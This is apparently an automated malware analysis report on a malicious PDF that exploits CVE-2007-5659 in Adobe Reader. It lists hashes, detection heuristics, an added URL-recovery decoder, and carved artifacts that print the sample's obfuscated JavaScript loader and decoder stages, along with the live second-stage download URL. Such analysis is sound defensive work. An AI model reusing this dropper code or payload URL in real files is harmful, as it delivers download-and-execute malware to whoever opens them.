Malicious PDF — malware analysis report

Static analysis result for SHA-256 77b87a4cc942affc…

Verdict: MALICIOUS
File type: PDF
Size: 15.9 KB
MD5: 8ab268aebd6278bc867ebc5a2faca92c
SHA-1: abcc71542a1240e8670480aeb63ef00b11c89240
SHA-256: 77b87a4cc942affc7b0a3c0ff4f08ace7b57e867bc677df29271fccc3d567876
Risk score: 366

Malware Insights

MITRE ATT&CK
  • T1203 Exploitation for Client Execution
  • T1059.007 Command and Scripting Interpreter: JavaScript

The PDF contains obfuscated JavaScript that exploits CVE-2007-5659 in Adobe Reader. The script is designed to download a second-stage payload from the URL http://searchfunes.org/cgi-bin/153/n002106201r0019R0cf18aa2X6b83b35bY42ed9557Z0100f060. The presence of multiple critical- and high-severity heuristics related to PDF JavaScript exploits and droppers strongly indicates malicious intent.

Machine Learning

  • Nyx PDF Classifier malicious score 1.0000

Heuristics (10)

  • Collab.collectEmailInfo — CVE-2007-5659 [critical; CVE match: exact; rule: CVE_2007_5659]
    PDF JavaScript calls Collab.collectEmailInfo. CVE-2007-5659 is a buffer overflow in Adobe Reader triggered by an over-long or heap-sprayed msg argument passed to Collab.collectEmailInfo(), one of a series of Acrobat JavaScript API exploits. (Identified after static deobfuscation.)
  • JavaScript action [low; 5 related findings; rule: PDF_JAVASCRIPT]
    PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • Adobe Reader APSB08-13 patch-range version gate (CVE-2007-5659) [high; CVE match: likely; rule: PDF_JS_ADOBE_APSB08_13_PATCH_GATE]
    PDF JavaScript gates the exploit payload on (>= 8 && < 8.1.1) OR (< 7.1): the Reader 7.0.x / 8.0–8.1.1 window patched by Adobe APSB08-13 for the CVE-2007-5659 Collab.collectEmailInfo buffer overflow. Only kits that target that exact bug check both of those patch points; benign scripts do not.
  • PDF JavaScript exploit cluster [critical; rule: PDF_JS_EXPLOIT_CLUSTER]
    PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript on its own remains low severity, but this correlated cluster is high-confidence malicious behavior.
  • Obfuscated multi-stage PDF JavaScript dropper [high; rule: PDF_JS_OBFUSCATED_DROPPER]
    PDF JavaScript shows 5 independent signals of exploit-kit-style multi-stage obfuscation: annot_subject_stage, hex_codec_loop, hex_dashed_payload, incremental_eval_build, repeated_pluginschk. This is strongly consistent with pre-2011 Adobe Reader PDF droppers: OpenAction JavaScript reads encoded data from annotation subjects, decodes it through one or more hex / base-N loops, and invokes eval indirectly (the method name is built one character at a time). The CVE actually triggered is hidden in the final decoded layer and is not visible to static analysis of the outer layers.
  • PDF JavaScript shellcode contains an embedded download URL [high; rule: PDF_JS_SHELLCODE_DOWNLOAD_URL]
    Decoded PDF JavaScript shellcode contains a hardcoded http(s) URL stored as little-endian %uXXXX Unicode escapes. Reader exploit shellcode embeds the second-stage fetch URL this way and pulls it down with a urlmon/URLDownloadToFile-style download-and-execute routine (commodity downloader behaviour rather than a specific Acrobat CVE).
  • Embedded JS stream [low; rule: PDF_JS]
    PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
  • ClamAV: Pdf.Exploit.Agent-35901 [critical; rule: CLAMAV_DETECTION]
    ClamAV detected this file as malware: Pdf.Exploit.Agent-35901.
  • Suspicious extracted artifact [info; rule: EXTRACTED_FILE_STATIC_TRIAGE]
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL [info; rule: EMBEDDED_URL]
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://searchfunes.org/cgi-bin/153/n002106201r0019R0cf18aa2X6b83b35bY42ed9557Z0100f060 (referenced by PDF JavaScript)
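The PDF_JS_SHELLCODE_DOWNLOAD_URL finding above describes a second-stage URL stored inside %uXXXX-escaped shellcode, each escape holding two bytes little-endian. The following is an added example, not part of this report, the sample, or the analysis tool, showing how to expand such escapes into the bytes Reader would place on the heap and pull the embedded URL back out. The shellcode string is constructed for illustration and its URL (example.test) is a placeholder, not the sample's.

```javascript
// Added example: recover a download URL from %uXXXX-escaped shellcode.
// Not part of the sample or the analysis tool; the input below is constructed.

// Expand a JavaScript unescape()-style string into raw bytes. %uXXXX is a
// UTF-16 code unit that lands in memory little-endian (low byte first),
// %XX is a single byte, and anything else is taken as a literal character.
function unescapeToBytes(escaped) {
  const out = [];
  const re = /%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})|([\s\S])/g;
  let m;
  while ((m = re.exec(escaped)) !== null) {
    if (m[1] !== undefined) {
      const unit = parseInt(m[1], 16);
      out.push(unit & 0xff, unit >> 8);
    } else if (m[2] !== undefined) {
      out.push(parseInt(m[2], 16));
    } else {
      out.push(m[3].charCodeAt(0) & 0xff);
    }
  }
  return Uint8Array.from(out);
}

// Scan decoded bytes for printable http(s) URLs. Downloader shellcode keeps the
// URL as a NUL-terminated ASCII string, so stopping at the first non-printable
// byte yields exactly the string a URLDownloadToFile-style call would receive.
function extractUrls(bytes) {
  let text = "";
  for (const b of bytes) text += String.fromCharCode(b);
  return text.match(/https?:\/\/[\x21-\x7e]+/g) || [];
}

function recoverDownloadUrls(escaped) {
  return extractUrls(unescapeToBytes(escaped));
}

// Constructed shellcode string (placeholder URL, not the sample's):
// a short NOP-sled stand-in, then "http://example.test/ab", then a NUL.
const CONSTRUCTED_SHELLCODE =
  "%u9090%u9090" +
  "%u7468%u7074%u2f3a%u652f%u6178%u706d%u656c%u742e%u7365%u2f74%u6261" +
  "%u0000";

console.log(recoverDownloadUrls(CONSTRUCTED_SHELLCODE));
```

Run against the real sample, the input would be the %u string carved from the decoded JavaScript layer rather than the constructed one; the byte order matters, since reading the escapes as big-endian yields transposed characters ("ttph//:...") and the URL regex misses them.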

Extracted artifacts (3)

Files carved from inside the sample during analysis.

Filename: javascript_obj0005_000.js
SHA-256: 4718a27c2224fc36bf24f8e8e04598f1ad78adce4401c7be2708318738a6983d
Kind: pdf-javascript-stream
Source: PDF /JS object 5 at offset 0x148
Size: 469 bytes
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token)
Preview script (first 1,000 lines of the extracted script):
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app[fnc]/**/(buf);
}

Filename: legacy_pdfkit_stage_000.js
SHA-256: ca80bec4d18c459afd0bd3b9115f8c91c9674c3b3ec6276503b24757d719e0a7
Kind: deobfuscated-js
Source: repeated-marker hex decoded JavaScript at offset 0x1AFD
Size: 12674 bytes
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 1 eval/decoder/string-building token and 1 long base64-like blob)
Preview script (first 1,000 lines of the extracted script):
function dld__18g(ph311ONQDi, v_382R2_QDY2i){var Cxt3__4wu3sa = 20;var qtb5__c_al = 0;var jOv5V6Ef2_4_t = 512;var IjJj5_8FH_7G = Cxt3__4wu3sa;var Q1LOPAnu = "";var RK7vE_S_Hxi_5 = 4;var jVB__4 = this;var M74mW7J7 = "1234ee";var o1JPS_wrP = arguments;try {var oa_Cgu = 0;if (app) {IjJj5_8FH_7G = IjJj5_8FH_7G + 2;v_382R2_QDY2i = pr[oa_Cgu].subject;}M74mW7J7 = M74mW7J7.replace(/\d+/, "call");} catch(e) { }IjJj5_8FH_7G = IjJj5_8FH_7G - Cxt3__4wu3sa;var sBOT5H_L___ra = new Array();var lH4P_v = 150;if (lH4P_v > 0) {sBOT5H_L___ra[0] = lH4P_v;sBOT5H_L___ra[1] = jOv5V6Ef2_4_t;sBOT5H_L___ra[0] = sBOT5H_L___ra[0] - lH4P_v;sBOT5H_L___ra[2] = sBOT5H_L___ra[0];sBOT5H_L___ra[1] = sBOT5H_L___ra[1] - jOv5V6Ef2_4_t;sBOT5H_L___ra[3] = sBOT5H_L___ra[1];}if (ph311ONQDi) { sBOT5H_L___ra = ph311ONQDi;}if (!ph311ONQDi) {var NI__XmCNY = o1JPS_wrP[M74mW7J7].toString();var o_8ap__wLC_vO = 0;var Mn6_1T = o_8ap__wLC_vO;lH4P_v = lH4P_v - 102;var m_8D3__OfF6r = 0;while(Mn6_1T < NI__XmCNY.length) {m_8D3__OfF6r = NI__XmCNY.charCodeAt(Mn6_1T);if (m_8D3__OfF6r >= lH4P_v && m_8D3__OfF6r <= 57) {if (o_8ap__wLC_vO == RK7vE_S_Hxi_5) {o_8ap__wLC_vO = -1;}if (o_8ap__wLC_vO < 0) { o_8ap__wLC_vO = 0; }sBOT5H_L___ra[o_8ap__wLC_vO] += m_8D3__OfF6r;if (sBOT5H_L___ra[o_8ap__wLC_vO] > jOv5V6Ef2_4_t) {sBOT5H_L___ra[o_8ap__wLC_vO] -= jOv5V6Ef2_4_t;}o_8ap__wLC_vO = o_8ap__wLC_vO + 1;}Mn6_1T = Mn6_1T + 1;}}var mVTTS_0v = 0;var iYc__fj = 0;var q_F86__3___on = -1;var r1Mx7h_ii = 0;var lr0Knp__4__i_AX = 0;do {var Jol6__0w1C = 256;if (sBOT5H_L___ra[r1Mx7h_ii] > Jol6__0w1C) {sBOT5H_L___ra[r1Mx7h_ii] -= Jol6__0w1C;}r1Mx7h_ii = r1Mx7h_ii + 1;} while (r1Mx7h_ii < RK7vE_S_Hxi_5);r1Mx7h_ii = r1Mx7h_ii - RK7vE_S_Hxi_5;while(r1Mx7h_ii < v_382R2_QDY2i.length) {var RN_g1r = v_382R2_QDY2i.substr(r1Mx7h_ii, 1) + ' V V ';r1Mx7h_ii = r1Mx7h_ii + 1;var kt_Ew3 = parseInt(RN_g1r, Cxt3__4wu3sa);if (q_F86__3___on != -1) {iYc__fj += kt_Ew3;if (mVTTS_0v == RK7vE_S_Hxi_5) {mVTTS_0v = 0;}var d25kqKfB_d8_lr = iYc__fj;d25kqKfB_d8_lr = 
d25kqKfB_d8_lr - (lr0Knp__4__i_AX + 2) * sBOT5H_L___ra[mVTTS_0v];if (d25kqKfB_d8_lr <= 0) {d25kqKfB_d8_lr = d25kqKfB_d8_lr - Math.floor(d25kqKfB_d8_lr / 256) * 256;}d25kqKfB_d8_lr = String.fromCharCode(d25kqKfB_d8_lr);if (IjJj5_8FH_7G == 1) {Q1LOPAnu += kt_Ew3;} else if (IjJj5_8FH_7G == 2) {Q1LOPAnu += d25kqKfB_d8_lr;} else {Q1LOPAnu += r1Mx7h_ii;q_F86__3___on = -2;}q_F86__3___on = -1;mVTTS_0v = mVTTS_0v + 1;lr0Knp__4__i_AX = lr0Knp__4__i_AX + 1;} else if (q_F86__3___on == -1) {q_F86__3___on = Cxt3__4wu3sa;iYc__fj = kt_Ew3 * Cxt3__4wu3sa;}}var DI_2K_8cn_7y3k = this;DI_2K_8cn_7y3k['ev'+'al'](Q1LOPAnu);}
	dld__18g(0, "
... (truncated)

Filename: deobfuscated.js
SHA-256: 0adc54e4bd37ed41e7cf861c83a20dde6f3d6314ccbbf5807adeffe16ce77c79
Kind: deobfuscated-js
Source: PDF JavaScript deobfuscation pass
Size: 79007 bytes
Detection: ClamAV: No threats found
Obfuscation or payload: likely (carved artifact contains 9 eval/decoder/string-building tokens and 2 long base64-like blobs)
Preview script (first 1,000 lines of the extracted script):
var pr = null;
var fnc = 'ev';
var sum = '';

app.doc.syncAnnotScan();

if (app.plugIns.length != 0) {
	var num = 1;

	pr = app.doc.getAnnots(
		{
			nPage: 0
		}
	);

	sum = pr[num].subject;
}

var buf = "";

if (app.plugIns.length > 3) {
	fnc += 'a';
	var arr = sum.split(/-/);

	
	for (var i = 1; i < arr.length; i++) {
		buf += String.fromCharCode("0x"+arr[i]);
	}
	fnc += 'l';
}

if (app.plugIns.length >= 2)
{
	app.eval(buf);
}

... (truncated)